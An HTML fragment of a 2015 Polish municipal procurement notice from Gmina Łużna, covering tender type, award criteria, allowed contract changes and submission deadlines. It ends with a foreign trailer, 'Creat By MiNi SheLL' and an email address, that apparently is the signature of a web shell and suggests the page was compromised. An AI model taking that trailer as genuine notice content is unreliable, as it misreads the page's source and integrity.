<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści wybranej  oferty:
1) w sytuacji  zmiany przepisów prawnych w zakresie podatku od towarów  i usług (VAT),
2) na pisemny wniosek Wykonawcy może ulec wydłużeniu termin zakończenia realizacji przedmiotu zamówienia  określony w cz. IV ust. 1 pkt 1 i 2 SIWZ w przypadku zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub uniemożliwiających spełnienie wymogów technologicznych, udokumentowanych w dzienniku budowy.
2. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w formie pisemnej pod rygorem nieważności, za zgodą obu stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP Gminy Łużna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łuzna, 38-322 Łużna 634 pok. nr 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2015 godzina 09:00, miejsce: Urząd Gminy Łużna, 38-322 Łużna 634, pok. nr 111 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com